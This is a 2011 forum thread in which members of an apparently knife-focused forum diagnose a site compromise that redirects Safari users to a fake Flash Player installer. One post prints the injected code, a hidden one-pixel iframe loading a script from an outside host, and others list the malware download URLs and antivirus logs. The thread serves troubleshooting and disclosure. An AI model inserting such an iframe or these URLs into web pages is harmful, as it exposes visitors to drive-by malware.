PDA

View Full Version : Redirect problems?



Dave Martell
11-12-2011, 07:53 PM
I have two reports of the site url being redirected automatically. Is anyone having this problem?

ajhuff
11-12-2011, 08:07 PM
Nope.

-AJ

Pensacola Tiger
11-12-2011, 08:08 PM
Yes, but only with Safari on OS X.

It redirects to http://94.199.51.3/FlashPlayer-11-4-macos.pkg, http://adobeflashplayer.uk.to/4f/

That downloads FlashPlayer-11-macos.pkg, and if you are allowing downloads to launch automatically, you're pwned.

It then goes to www.google.com to cover its tracks.

Vertigo
11-12-2011, 08:14 PM
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl and hXXp:www.cookaround.com -- If you're allowing scripts globally, you're probably allowing those sites too. If you're not sure, watch the bottom of your screen as you load the forum and you will see those sites quickly load as well.

Burl Source
11-12-2011, 08:16 PM
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.

Pensacola Tiger
11-12-2011, 08:18 PM
Another forum member who uses Safari sent me an email.
Said he is getting redirected to a Flash site as well.

Tell him to use Chrome or Firefox. I haven't been able to figure out how to get Safari to work.

Burl Source
11-12-2011, 08:18 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.

Dave Martell
11-12-2011, 08:21 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
I use Firefox. No redirects but the other addresses showed for a fraction of a second at the bottom of my page.


I just tried this and got the same thing. I'm using Chrome which is blocking it but none the less it looks like we have a problems. Stinking hackers.

Vertigo
11-12-2011, 08:21 PM
I just tried reloading and a couple other addresses are flashing across the bottom of my screen.
NoScript is your friend, people!

mr drinky
11-12-2011, 08:32 PM
Both of my Macs won't properly direct to KKF. I am on an ancient PC right now. My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.

Dave Martell
11-12-2011, 09:11 PM
I'm on it guys.

SpikeC
11-12-2011, 09:44 PM
My Mac book is redirecting, butt my iPad is not.

ecchef
11-12-2011, 09:45 PM
I'm navigating ok, but I do see some bullsh!t www.cookaround.com link flash by. I also now have to double click to back arrow.

mr drinky
11-12-2011, 09:57 PM
Both of my Macs are working properly now.

k.

Eamon Burke
11-12-2011, 09:58 PM
Hmmm no issues here.

Chrome on win 7, android on my galaxy s.

UglyJoe
11-12-2011, 10:11 PM
I'm also still having the redirect problems. Safari, here.

littleroundman
11-12-2011, 10:39 PM
Eset Nod 32 antivirus is indicating:

13/11/2011 11:49:12 AM HTTP filter archive http://superbesttraf.orge.pl/iframe.php?id=406x8gaw3trjcn1wx4kmv41roybsmal HTML/Iframe.B.Gen virus connection terminated - quarantined \Owner Threat was detected upon access to web by the application: C:\Internet\Firefox 4\firefox.exe.

EdipisReks
11-12-2011, 10:41 PM
I'm also still having the redirect problems. Safari, here.

same.

Vertigo
11-12-2011, 10:47 PM
My redirects end up at Google, so I assumed it was the Google Redirect Virus. Maybe a file in one of the threads is spreading that virus?

k.
I don't think this is a Google Redirect Virus thing. It appears for all intents and purposes to be an HTML:Iframe-inf infection, though there could be more going on behind the scenes.

If you're using Chrome, Firefox with NoScript, IE with Java disabled or a Smartphone you should be fine--though I did just get a hit on my IDS an hour or two ago indicating that the orge.pl site was trying to give me a worm. Lulz.

Wrap 'em up, boys.

tk59
11-12-2011, 10:57 PM
I haven't seen anything on IE or Firefox.

SpikeC
11-12-2011, 11:07 PM
This seems to be related to Flash. It is affecting Safari on my Mac book, but not safari on my iPad, which does not allow flash.

mr drinky
11-12-2011, 11:12 PM
NoScript blocks attempts for the site to load hXXp:superbesttraf.orge.pl

Maybe it is the newest member, PolishAvenger ;) Just kidding, but when this stuff happens, I do sort of think about those crazy threats from MadRookie way back when. I'm sure it has nothing to do with him, but it did cross my mind.

k.

Vertigo
11-12-2011, 11:14 PM
I haven't seen anything on IE or Firefox.

It may be transparent, but regardless this is what's happening: (right click for big)

http://www.souppilgrim.com/orglif/thing.jpg

Those should most definitely not be there, and the first one (the Iframe infection orge.pl) is possibly malicious. I suspect the second one is just using our traffic to increase it's own impression.

Vertigo
11-12-2011, 11:17 PM
Maybe it is the newest member, PolishAvenger ;)
That's ... strangely ominous... lol

JBroida
11-12-2011, 11:25 PM
this is what it is in your code dave:
</div>



</div><div style="display:none"><iframe src="http://www.cookaround.com/cook/robots.php" width="1" height="1"></iframe></div>

</body>

</html>

its right at the end of your pages code before the end of the body

Vertigo
11-12-2011, 11:31 PM
Can you find where the other one is hiding Jon? I'm not seeing it anywhere.

JBroida
11-12-2011, 11:35 PM
i think its hidden in the iframe, but i dont really want to look into that from my home laptop right now

Vertigo
11-13-2011, 12:18 AM
Oh derp. Yep. Sup Google. (http://www.google.com/safebrowsing/diagnostic?site=cookaround.com)

PierreRodrigue
11-13-2011, 12:48 AM
My anti virus just blocked a script trying to open a PM. I aint got no 'puter savy, but it doesn't seem to have dug in.

sw2geeks
11-13-2011, 01:32 AM
I also get the redirect using Firefox on the mac

markk
11-13-2011, 09:01 AM
mac w/safari here. I was getting the redirect but not any longer.

SpikeC
11-13-2011, 12:57 PM
Seems fixed now!

JBroida
11-13-2011, 01:03 PM
still there in the code from what i can see

Burl Source
11-13-2011, 01:08 PM
the cookaround thing is still there

JohnnyChance
11-13-2011, 01:47 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

JBroida
11-13-2011, 02:58 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

haha

UglyJoe
11-13-2011, 05:30 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

Well, I'm on a Mac, and the redirect happened... but nothing happened because of it. And if something had happened, I could have just dragged it to the trash and emptied it... Win.

mr drinky
11-13-2011, 06:26 PM
My anti virus just blocked a script trying to open a PM. I aint got no 'puter savy, but it doesn't seem to have dug in.

I almost made my signature "Pierre aint got no 'puter savy."

k.

Andrew H
11-13-2011, 06:28 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.

Just what I was thinking, sadly I have one of both.

Dave Martell
11-13-2011, 06:58 PM
I lost one of the redirects but picked up one for Photobucket....argh

Vertigo
11-13-2011, 07:02 PM
It's time like these that it sucks to have attack-vulnerable PC and not a Mac.....oh....wait. Nvm.
I'd rather have a car that can cruise at 120 miles an hour, and keep it secure, than be stuck with a car that maxes at 50 and gloat because nobody wants to steal it.

;)

Vertigo
11-13-2011, 07:05 PM
I lost one of the redirects but picked up one for Photobucket....argh

Before doing anything else, upgrade to the newest version of vBulletin. You're running old, exploited software. Even if you fix the problem it will come back the next time an Evil Robot stumbles upon your site.

mr drinky
11-13-2011, 07:12 PM
Vertigo and Jon have gone all Rain Man on us with forum troubleshooting...code, updates...

I wouldn't doubt they have both already traced the person responsible and are heading out together in a non-descript white conversion van to go kick some butt -- possibly with Jon's zombie killer shop blade.

k.

Andrew H
11-13-2011, 07:35 PM
I'd rather have a car that can cruise at 120 miles an hour, and keep it secure, than be stuck with a car that maxes at 50 and gloat because nobody wants to steal it.

;)
Because Macs are the high performance computers of the world?

Vertigo
11-13-2011, 07:55 PM
Because Macs are the high performance computers of the world?
That depends upon your definition of performance, doesn't it. You can't exploit a system with nothing to exploit, and that pertains to both end users and ebil robots. Lol.

Dave Martell
11-13-2011, 08:30 PM
Vertigo and Jon have gone all Rain Man on us with forum troubleshooting...code, updates...

I wouldn't doubt they have both already traced the person responsible and are heading out together in a non-descript white conversion van to go kick some butt -- possibly with Jon's zombie killer shop blade.

k.


The RainMen have fixed the forum! :D

Yup, I found the corrupt line of code based on what they showed here in this thread. Thanks geeks (I mean - guys!). :wink: :doublethumbsup:

Dave Martell
11-13-2011, 08:41 PM
Can you confirm that the re-direct is gone?

Pensacola Tiger
11-13-2011, 08:47 PM
Can you confirm that the re-direct is gone?

I'm not seeing it anymore.

Vertigo
11-13-2011, 08:50 PM
Can you confirm that the re-direct is gone?

I'm on the road right now so I can't tell. I can see, though, that the forum version is still the old vulnerable version, so even if its gone right now it won't be gone long. ;)

PierreRodrigue
11-13-2011, 08:55 PM
Hahaha! "nine cans of ravioli..." and "sauce flavored with meet" Thats funny!! :D

Dave Martell
11-13-2011, 08:58 PM
I can see, though, that the forum version is still the old vulnerable version, so even if its gone right now it won't be gone long. ;)

I can't do this myself, I have to have the people we pay to do these things do this. Anyway, there's a new version every other day so it'll never be up to date. :)

Dave Martell
11-13-2011, 08:59 PM
I'm not seeing it anymore.


Booyah! :D

Vertigo
11-13-2011, 09:19 PM
I can't do this myself, I have to have the people we pay to do these things do this. Anyway, there's a new version every other day so it'll never be up to date. :)

Being vigilant in staying up to date against an ever-changing tech curve is one thing; using an old iteration of software which is proven vulnerable to SQL scripting and iFrame injections is another. Anyways, it's resolved for the time being! Woot!

Dave Martell
11-13-2011, 09:41 PM
I can't argue with you on that.

add
11-13-2011, 11:00 PM
Because Macs are the high performance computers of the world?

Not always highest performance.

But perhaps just an extremely stable, off the shelf, user friendly, economical (long term), well supported, and ever increasingly popular choice... :razz: